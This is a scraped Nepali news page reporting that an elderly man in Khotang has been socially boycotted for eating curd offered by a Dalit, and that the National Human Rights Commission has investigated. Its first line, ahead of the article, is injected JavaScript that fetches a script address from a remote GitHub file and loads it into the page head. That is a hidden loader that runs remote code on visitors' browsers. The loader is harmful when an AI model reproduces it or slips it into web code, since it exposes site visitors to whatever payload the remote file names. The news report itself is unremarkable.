;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); खोटाङमा दलितले दिएको दही खाएको आरोपमा साढे २ वर्षदेखि आचार्य समाजबाट बहिष्करणमा – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • खोटाङमा दलितले दिएको दही खाएको आरोपमा साढे २ वर्षदेखि आचार्य समाजबाट बहिष्करणमा
जुनेली बिशेष

खोटाङमा दलितले दिएको दही खाएको आरोपमा साढे २ वर्षदेखि आचार्य समाजबाट बहिष्करणमा

फागुन १५,

काठमाडौं । खोटाङको दिक्तेल रुपाकोट मझुवागढी नगरपालिकामा एकजना ज्येष्ठ नागरिक लामो समयदेखि बहिष्करणमा परेको खुलेको छ । दलित समुदायका व्यक्तिले दिएको दही खाएको आरोपमा टंकप्रसाद आचार्य आफन्त र छिमेकीबाट बहिष्करणमा परेको राष्ट्रिय मानव अधिकार आयोगले जनाएको छ ।

आचार्यले २०७५ असारमा जिल्ला समन्वय समिति खोटाङले आयोजना गरेको जातीय भेदभावविरुद्धको सहभोज कार्यक्रममा दलित समुदायका व्यक्तिले दिएको दही खाएका थिए । त्यसयता उनी समाजमा बहिष्करण हुँदै आएको अनुगमनका क्रममा खुलेको आयोगले जनाएको छ ।

घटना बाहिर आएपछि मानव अधिकार आयोगका सचिव वेद भट्टराईसहित अधिकृतहरु संलग्न उच्चस्तरीय टोलीले अनुगमन गरेको थियो । अनुगमन टोलीले पीडित आचार्यको घरमै पुगेर विष्तृत जानकारी लिएको छ ।

अनुगमनपछि विज्ञप्ति जारी गर्दै आयोगले जातीय भेदभावविरुद्धको अभियानमा संलग्न ज्येष्ठ नागरिकलाई समाजले गौरवको रुपमा लिनुपर्नेमा बहिष्कार गर्नु निन्दनीय भएको बताएको छ ।

घटनामा संलग्नलाई कारबाही गरी पीडितलाई मानसिक पीडाबाटमुक्त गर्न जिल्ला प्रशासन कार्यालय खोटाङ र नगरपालिकालाई आयोगले पत्रसमेत लेखेको छ ।file photo

फेसबुक प्रतिक्रियाहरु